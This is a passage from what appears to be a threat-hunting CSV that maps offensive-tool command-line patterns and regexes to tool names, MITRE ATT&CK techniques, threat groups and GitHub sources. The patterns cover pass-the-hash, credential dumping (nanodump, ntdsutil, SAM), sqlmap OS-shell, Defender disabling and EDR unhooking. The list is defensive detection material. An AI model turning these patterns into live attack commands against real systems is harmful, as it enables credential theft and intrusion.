TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "* tunnel-socks5.py*",".{0,1000}\stunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* TunnelVisionVM.ova*",".{0,1000}\sTunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "* 
tweetshell.sh*",".{0,1000}\stweetshell\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "* --type asreproast*",".{0,1000}\s\-\-type\sasreproast.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "* --type search-spn*",".{0,1000}\s\-\-type\ssearch\-spn.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "* -Type SMBClient -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBClient\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBEnum\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBExec\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -type user -search * -DomainController * -Credential * -list yes*",".{0,1000}\s\-type\suser\s\-search\s.{0,1000}\s\-DomainController\s.{0,1000}\s\-Credential\s.{0,1000}\s\-list\syes.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Type WMIExec *",".{0,1000}\s\-Type\sWMIExec\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sWMIExec\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*",".{0,1000}\s\-u\s.{0,1000}\s\-d\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-k\s\-\-no\-pass\s\-\-target\s.{0,1000}\s\-\-action\s\""list\"".{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "* -u * --local-auth*",".{0,1000}\s\-u\s.{0,1000}\s\-\-local\-auth.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u * -p * --lusers*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-lusers.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u * -p * -M handlekatz*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\shandlekatz.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -u * -p * -M nanodump*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\snanodump.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -u * -p * -M ntdsutil*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sntdsutil.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -u * -p * 
--sam",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u * -p * --shares*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u * -p *--pass-pol*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-\-pass\-pol.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u *http* --dbs",".{0,1000}\s\-u\s.{0,1000}http.{0,1000}\s\-\-dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* -u *http* --os-shell*",".{0,1000}\s\-u\s.{0,1000}http.{0,1000}\s\-\-os\-shell.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* -u FUZZ *",".{0,1000}\s\-u\sFUZZ\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* -u http* -f *.dll * -p *",".{0,1000}\s\-u\shttp.{0,1000}\s\-f\s.{0,1000}\.dll\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* -u http* --wordlisturl * -e php,aspx --recursion true*",".{0,1000}\s\-u\shttp.{0,1000}\s\-\-wordlisturl\s.{0,1000}\s\-e\sphp,aspx\s\-\-recursion\strue.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "* -u jasminadmin -p* jasmin_db *",".{0,1000}\s\-u\sjasminadmin\s\-p.{0,1000}\sjasmin_db\s.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "* -U msf -P msf *",".{0,1000}\s\-U\smsf\s\-P\smsf\s.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "* -u wordlist * wordlist_uniq_sorted*",".{0,1000}\s\-u\swordlist\s.{0,1000}\swordlist_uniq_sorted.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "* -U:T -ShowWindowMode:Hide reg add *",".{0,1000}\s\-U\:T\s\-ShowWindowMode\:Hide\sreg\sadd\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "* -UacMe Elevate -Execute *",".{0,1000}\s\-UacMe\sElevate\s\-Execute\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells 
in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* UAC-TokenMagic.ps1*",".{0,1000}\sUAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "* uberfile.py *",".{0,1000}\suberfile\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* ubiquiti-discovery.nse*",".{0,1000}\subiquiti\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* UefiShell.iso*",".{0,1000}\sUefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "* --unconstrained-users*",".{0,1000}\s\-\-unconstrained\-users.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* unDefender.exe*",".{0,1000}\sunDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "* -unhook -antidebug *",".{0,1000}\s\-unhook\s\-antidebug\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense 
Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -unhook -antidebug * -self -sleep*",".{0,1000}\s\-unhook\s\-antidebug\s.{0,1000}\s\-self\s\-sleep.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -unhook -syscalls -obfuscate *",".{0,1000}\s\-unhook\s\-syscalls\s\-obfuscate\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* --unhook-method * --dont-unload-driver * --dump-output *",".{0,1000}\s\-\-unhook\-method\s.{0,1000}\s\-\-dont\-unload\-driver\s.{0,1000}\s\-\-dump\-output\s.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "* unicorn.py*",".{0,1000}\sunicorn\.py.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "* --union-char *GsFRts2*",".{0,1000}\s\-\-union\-char\s.{0,1000}GsFRts2.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* unittest.nse*",".{0,1000}\sunittest\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* unusual-port.nse*",".{0,1000}\sunusual\-port\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* upnp-info.nse*",".{0,1000}\supnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* uptime-agent-info.nse*",".{0,1000}\suptime\-agent\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -UrbanBishop -Command *",".{0,1000}\s\-UrbanBishop\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* --url * --attacker *",".{0,1000}\s\-\-url\s.{0,1000}\s\-\-attacker\s.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation 